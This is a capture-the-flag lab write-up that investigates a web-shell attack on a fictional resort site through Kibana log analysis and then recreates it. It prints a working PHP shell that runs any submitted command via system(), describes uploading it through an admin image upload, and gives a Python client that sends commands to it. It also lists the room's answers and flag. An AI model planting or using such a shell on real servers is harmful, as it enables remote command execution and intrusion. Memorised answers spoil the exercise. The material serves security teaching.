# Day 3

<figure><img src="/files/frXAz2ianaBPEzPdMFK7" alt=""><figcaption></figcaption></figure>

The target is a resort’s website, where an attacker uploaded a malicious web shell and exploited it. Our mission is twofold:

1. Use log analysis with KQL (Kibana Query Language) to investigate the attack.
2. Recreate the attack to retrieve the stolen **flag.txt**.

We start by analyzing logs from the **frostypines-resorts** dataset using KQL in Kibana. The timeframe is set from `Oct 3, 2024, 11:30:00` to `Oct 3, 2024, 12:00:00`.

<figure><img src="/files/Nklv2P3nxUD1CtJHkdU0" alt=""><figcaption></figcaption></figure>

We also filter the logs for `shell.php`, the file the attacker uploaded.

The matching events show that the file was uploaded to `/media/images/rooms/shell.php` and that it was then requested by `10.11.83.34`, so that address is the one that accessed the web shell.
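The Kibana steps above (time picker set to the 30-minute window, then a free-text filter for `shell.php`) are the same two filters any log hunt applies. The script below is an added example, not part of the original write-up or the room's dataset: it runs that hunt over a handful of constructed Apache-style access log lines. The path and source IP are the ones the write-up found; the timestamps, the second client `10.9.0.7`, the `POST /admin` upload request and the `command=` values are made up for illustration. It also decodes the `command` query parameter so you can see what the web shell was asked to run.

```python
import re
from datetime import datetime, timezone
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (not the frostypines-resorts dataset). The last line is
# outside the investigation window and must be dropped by the time filter.
SAMPLE_LOG = """\
10.11.83.34 - - [03/Oct/2024:11:35:02 +0000] "GET /admin HTTP/1.1" 200 4201 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:36:40 +0000] "POST /admin HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:37:05 +0000] "GET /media/images/rooms/shell.php HTTP/1.1" 200 318 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:37:21 +0000] "GET /media/images/rooms/shell.php?command=whoami HTTP/1.1" 200 331 "-" "Mozilla/5.0"
10.11.83.34 - - [03/Oct/2024:11:38:09 +0000] "GET /media/images/rooms/shell.php?command=cat+flag.txt HTTP/1.1" 200 345 "-" "Mozilla/5.0"
10.9.0.7 - - [03/Oct/2024:11:39:50 +0000] "GET /media/images/rooms/room1.jpg HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
10.9.0.7 - - [03/Oct/2024:12:41:13 +0000] "GET /media/images/rooms/shell.php HTTP/1.1" 200 318 "-" "curl/8.0"
"""

# Combined log format: client IP, timestamp in brackets, quoted request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The window the write-up uses in Kibana.
WINDOW_START = datetime(2024, 10, 3, 11, 30, tzinfo=timezone.utc)
WINDOW_END = datetime(2024, 10, 3, 12, 0, tzinfo=timezone.utc)


def parse_line(line):
    """Turn one access-log line into a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    target = urlsplit(m["target"])
    return {
        "ip": m["ip"],
        "ts": ts,
        "method": m["method"],
        "path": target.path,
        "query": parse_qs(target.query),  # decodes '+' and %xx escapes
        "status": int(m["status"]),
    }


def hunt_web_shell(log_text, needle="shell.php", start=WINDOW_START, end=WINDOW_END):
    """Time-window filter plus substring match on the request path.

    Returns the path of the web shell, when it was first requested, every source
    IP that touched it and the commands passed in the `command` parameter.
    """
    hits = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None or not (start <= ev["ts"] < end):
            continue  # unparseable or outside the window
        if needle not in ev["path"]:
            continue
        hits.append(ev)
    if not hits:
        return None
    return {
        "path": hits[0]["path"],
        "first_seen": hits[0]["ts"].isoformat(),
        "source_ips": sorted({h["ip"] for h in hits}),
        "commands": [h["query"]["command"][0] for h in hits if "command" in h["query"]],
    }


if __name__ == "__main__":
    print(hunt_web_shell(SAMPLE_LOG))
```

Widening `end` past the window pulls in the `10.9.0.7` request from 12:41, which is exactly why the time picker matters: without it the "who accessed the shell" answer would have two IPs instead of one.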

**Recreating the attack:**

To do this, head to [`http://frostypines.thm`](http://frostypines.thm/).

The hostname does not resolve on its own: add the target machine's IP address and `frostypines.thm` to your `/etc/hosts` file on Linux before proceeding.

By navigating to `/admin`, we reach an admin panel with a room-creation feature that includes an image upload option.

<figure><img src="/files/DyKcSqosM32ONgxv6XlQ" alt=""><figcaption></figcaption></figure>

Here, we can upload a PHP web shell (`shell.php`) as the room's image. Note that this is a command-execution web shell, not a reverse shell: it does not call back to the attacker, it simply runs whatever is submitted to it and returns the output in the page:

```php
<html>
<body>
<!-- No action attribute, so the form submits back to shell.php itself;
     the command travels in the query string as ?command=... -->
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    // Deliberately unsafe: the attacker-controlled value goes straight to a shell.
    if(isset($_GET['command'])) 
    {
        // '2>&1' merges stderr into stdout so error messages are shown as well.
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>
```

When accessed, the script displays an input field. Whatever is entered there is passed to PHP's `system()` function and run on the underlying operating system as the web server's user, with the output displayed back to the user. The whole chain works because the application accepted a `.php` file as a room image and stored it under a web-accessible path, so the server executes it on request instead of serving it as a static file.

Once the file is uploaded, it can be accessed at the following URL:

[`http://frostypines.thm/media/images/rooms/shell.php`](http://frostypines.thm/media/images/rooms/shell.php)

On accessing the page, we have an input field and Execute button:

<figure><img src="/files/cfK4DG1wPjpDTTEm613M" alt=""><figcaption></figcaption></figure>

Try executing Linux commands to locate and read the flag!
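Typing commands into the form works, but for anything beyond a couple of commands a small client is quicker. The script below is an added example, not code from the original write-up: it reproduces the `GET ...?command=` request the form sends and pulls the output out of the `<pre>` block the web shell wraps it in. `SHELL_URL` is the path found above; the `run_command` call at the bottom needs the lab reachable via `/etc/hosts`, while `SAMPLE_RESPONSE` is a constructed page body so the parser can be exercised offline.

```python
import html
import re
from urllib.parse import urlencode, urlsplit, urlunsplit
from urllib.request import urlopen

# Where the web shell ended up on the target (from the log analysis above).
SHELL_URL = "http://frostypines.thm/media/images/rooms/shell.php"


def build_command_url(shell_url, command):
    """Build the same URL the form produces: shell.php?command=<url-encoded>.

    urlencode() turns spaces into '+' and escapes '/', which PHP decodes again
    on the other side, so multi-word commands and paths survive the trip.
    """
    parts = urlsplit(shell_url)
    return urlunsplit(parts._replace(query=urlencode({"command": command})))


# The web shell prints system() output between <pre> and </pre>.
PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.S)


def extract_output(page):
    """Return the command output from a web-shell response page."""
    m = PRE_RE.search(page)
    if not m:
        raise ValueError("no <pre> block in response: is this really the web shell?")
    # The PHP does not escape its output, but unescape anyway in case the
    # command printed something the server-side wrapper HTML-encoded.
    return html.unescape(m.group(1)).strip()


def run_command(command, shell_url=SHELL_URL, timeout=10):
    """Send one command to the web shell and return its output (network call)."""
    with urlopen(build_command_url(shell_url, command), timeout=timeout) as resp:
        return extract_output(resp.read().decode("utf-8", "replace"))


# Constructed response body shaped like what the PHP above returns for 'whoami';
# used only so extract_output() can be tested without the lab running.
SAMPLE_RESPONSE = """<html>
<body>
<form method="GET" name="shell.php">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
www-data
</pre>
</body>
</html>
"""


if __name__ == "__main__":
    # Identify the execution context, then look for the flag anywhere on disk.
    for cmd in ("whoami", "find / -name flag.txt 2>/dev/null"):
        print(f"$ {cmd}")
        print(run_command(cmd))
```

Because the shell appends `2>&1`, anything a command writes to stderr comes back inside the same `<pre>` block, so a failed `cat` shows its error text rather than an empty page.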

### Questions

1. BLUE: Where was the web shell uploaded to?\
   **Answer: `/media/images/rooms/shell.php`**

2. BLUE: What IP address accessed the web shell?\
   **Answer: `10.11.83.34`**

3. RED: What are the contents of flag.txt?\
   **Answer: `THM{Gl1tch_Was_H3r3}`**

***`Thank you!`***
